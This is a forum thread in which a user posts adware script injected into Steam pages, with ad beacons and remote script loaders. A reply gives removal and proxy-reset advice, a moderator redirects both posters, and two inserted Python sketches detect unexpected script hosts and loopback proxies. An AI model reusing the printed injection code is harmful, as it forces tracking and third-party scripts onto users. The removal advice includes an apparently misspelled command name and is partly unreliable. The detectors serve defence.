Steam Adware


tgspy

This is a rampant adware that I was unfortunately recently infected with; it was gained from an unknown location.

 

The script that it is injecting into the Steam source is as follows:

 

<!DOCTYPE html><html><head><script type="text/javascript" async="" src=""http://adsdelivery1.com"+"/no-im"+"pressi"+"on.gif?p=490&ch=amonetize.full"+"&l=AU"+"&h=2bf8e7f3d510e7970144ebd0fdcf3351&t="+new Date().getTime()+"&s=0d400ba3a88947e0832a456df51ad68c";</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=527"+"&p=488&ch=amonetize.full&ap=&cps=&c"+"=76&l=AU"+"&h=5ad23c4524c190eab9ab03cfd15f4ee8&t="+new Date().getTime()+"&s=0d400ba3a88947e0832a456df51ad68c";</script><script type="text/javascript">
var script = document.createElement("script");
if (window.location.protocol=="http:") {
}
else {
}
document.head.appendChild(script);
</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=986"+"&p=491&ch=amonetize.full&ap=&cps=&c"+"=69&l=AU"+"&h=08bdd86569aa6f59ce860076456a38e9&t="+new Date().getTime()+"&s=8e82c853c1254d9c30bd86a5f3a58553";</script><script type="text/javascript">
var s = document.createElement("script");
    s.type = "text/javascript";
document.body.appendChild(s);
</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=529"+"&p=749&ch=amonetize.full&ap=&cps=&c"+"=78&l=AU"+"&h=d65fcf27d5967e28b1287f88d96c80c7&t="+new Date().getTime()+"&s=8e82c853c1254d9c30bd86a5f3a58553";</script><script type="text/javascript">
   var s = document.createElement("script");
    s.id = "inj_grazit_script_starter";
    s.type = "text/javascript";
    s.src = (location.protocol == "https:" ? "https:" : "http:") +  "//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsOTQ4NjUsNDQ3NzksNDc4MjU%3D&subid=749";
    document.head.appendChild(s);
</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=369"+"&p=242&ch=amonetize.full&ap=&cps=&c"+"=31&l=AU"+"&h=f035c9d25a337c1f21da85be85cbc1ff&t="+new Date().getTime()+"&s=8e82c853c1254d9c30bd86a5f3a58553";</script><script type="text/javascript">
var script = document.createElement("script");
script.src = window.location.protocol + '//www.superfish.com/ws/sf_main.jsp?dlsource=ygztifv&CTID=generic';
document.head.appendChild(script);
</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=370"+"&p=241&ch=amonetize.full&ap=&cps=&c"+"=32&l=AU"+"&h=52f2929cb20d2b79fee45e8ba3a73d72&t="+new Date().getTime()+"&s=8e82c853c1254d9c30bd86a5f3a58553";</script><script type="text/javascript">
var script = document.createElement("script");
var head = document.getElementsByTagName('head')[0];
head.appendChild(script);
 
 
This adware also automatically installs a program called Privoxy, in order to automatically change the proxy settings of the computer to redirect to localhost, resulting in no connection to the internet if the Privoxy program is terminated. Any help with this would be great. Sorry I couldn't provide more details; I found nothing that directed to the file, and no scans helped either.
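Added example (not part of the original post, and not code from any tool named in this thread): a Python sketch that lists the hosts a saved page loads scripts or beacons from, after joining the split string literals the injected markup uses (`"/im"+"pressi"+"on.gif"`), and reports those outside an allowlist. The allowlist hosts and the sample capture are constructed for illustration; the three ad hosts are the ones quoted in the post.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts the page is expected to load from (illustrative placeholders).
EXPECTED_HOSTS = {"store.example.test", "cdn.example.test"}

# A closing quote, "+", and an opening quote: the seam between two split literals.
_CONCAT = re.compile(r"""["']\s*\+\s*["']""")
# Absolute or protocol-relative URLs that remain once the seams are removed.
_URL = re.compile(r"""(?:https?:)?//[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^\s"'<>]*""")

def join_literals(text):
    """Undo "a"+"b" style splitting so URLs appear as one string."""
    return _CONCAT.sub("", text)

def unexpected_hosts(html, expected=EXPECTED_HOSTS):
    """Return the sorted hosts referenced in html that are not on the allowlist."""
    hosts = set()
    for url in _URL.findall(join_literals(html)):
        host = urlsplit(url).hostname
        if host and host not in expected:
            hosts.add(host)
    return sorted(hosts)

# Constructed capture, abridged from the markup quoted in the post.
SAMPLE = '''<html><head>
<script src="https://cdn.example.test/js/main.js"></script>
<script>new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=527";</script>
<script>var s = document.createElement("script");
s.src = (location.protocol == "https:" ? "https:" : "http:") + "//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js";
document.head.appendChild(s);</script>
<script>var script = document.createElement("script");
script.src = window.location.protocol + '//www.superfish.com/ws/sf_main.jsp';
document.head.appendChild(script);</script>
</head></html>'''

if __name__ == "__main__":
    for host in unexpected_hosts(SAMPLE):
        print("unexpected host:", host)
```

A `//word.tld` sequence inside a JavaScript comment would also be reported, so treat the output as a list to review rather than a verdict.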

Hello, there is a way of getting rid of this nasty piece of ad-ware, as I had also gotten infected on the 24th of May through a download and it spread through to the Steam store and community. I was able to fix it by using a program called ComboFix, which basically looks for suspicious files in your system and destroys them. After you run this you should see some malicious files being picked up by ComboFix if you have ad-ware, and it will delete it.

 

.:IF STEP 1 WORKED PROCEED TO THIS STEP:.

Note: you may come into a different problem after removing the ad-ware, which is no internet connection, because the ad-ware from adsdelivery1DOTcom changes your connection settings, which I think is how it bypasses everything. But you can very easily re-enable your connection by going to Start > Run, typing inter.cpl in the Run box and pressing Enter, then clicking the Connections tab and the LAN settings option. If "use a proxy" is checked, uncheck it, click Apply, OK and exit, then check if the internet is active again. Hopefully you should then have internet and will definitely have no ad-ware.

 

If this does not work, you can Google similar problems after uninstalling ad-ware and you will find an alternate way to undo the ad-ware's nonsense.

 

Pictures below for any extra help if you are stuck!

 

Hope this helped 

 

wcalamaro11 (same name for Steam)

 

[Five attached screenshots, not preserved]
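Added example (not part of the reply above): a Python check of the same per-user proxy setting that the LAN settings dialog edits, reporting entries that point back at the local machine, as the first post describes Privoxy doing. The registry key and value names are the standard WinINET ones; the non-Windows sample value is constructed.

```python
import ipaddress
from urllib.parse import urlsplit

# WinINET per-user proxy settings (what the "LAN settings" dialog edits).
KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings"

def is_loopback(host):
    """True for localhost names and any 127.0.0.0/8 or ::1 address."""
    host = host.strip("[]").lower()
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # an ordinary hostname, not an IP literal

def loopback_entries(proxy_server):
    """Parse a ProxyServer value ("host:port" or "http=host:port;https=...")
    and return the (scheme, host, port) entries that point at this machine."""
    hits = []
    for part in filter(None, (p.strip() for p in proxy_server.split(";"))):
        scheme, _, addr = part.rpartition("=")
        if "://" in addr:  # tolerate "http://host:port"
            addr = addr.split("://", 1)[1]
        url = urlsplit("//" + addr)
        if url.hostname and is_loopback(url.hostname):
            hits.append((scheme or "all", url.hostname, url.port))
    return hits

def read_user_proxy():
    """Windows only: return (enabled, server) from the current user's settings."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, KEY) as key:
        def value(name, default):
            try:
                return winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                return default
        return bool(value("ProxyEnable", 0)), value("ProxyServer", "")

if __name__ == "__main__":
    import sys
    if sys.platform == "win32":
        enabled, server = read_user_proxy()
    else:  # constructed sample so the parser can be tried elsewhere
        enabled, server = True, "http=127.0.0.1:8118;https=127.0.0.1:8118"
    print("proxy enabled:", enabled, "| loopback entries:", loopback_entries(server))
```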


@tgspy:
 
Hello -- it appears that your post may have been inadvertently overlooked.
We cannot perform malware diagnostics or removal in this sub-section of the forum.
If you would like expert help with checking and cleaning your computer, I suggest that you please follow the advice in this pinned topic: Available Assistance For Possibly Infected Computers.
A malware analyst will assist you with looking into your issue.

 

 

 

@wcalamaro11:

 

Thanks for your offer of assistance.

However, regular members are NOT permitted to provide malware advice here at the forums.

Only authorized helpers may do so, and that work is conducted in a dedicated section of the forum - the individual OP and the authorized helpers work one-on-one there.

 

Thanks to you both,
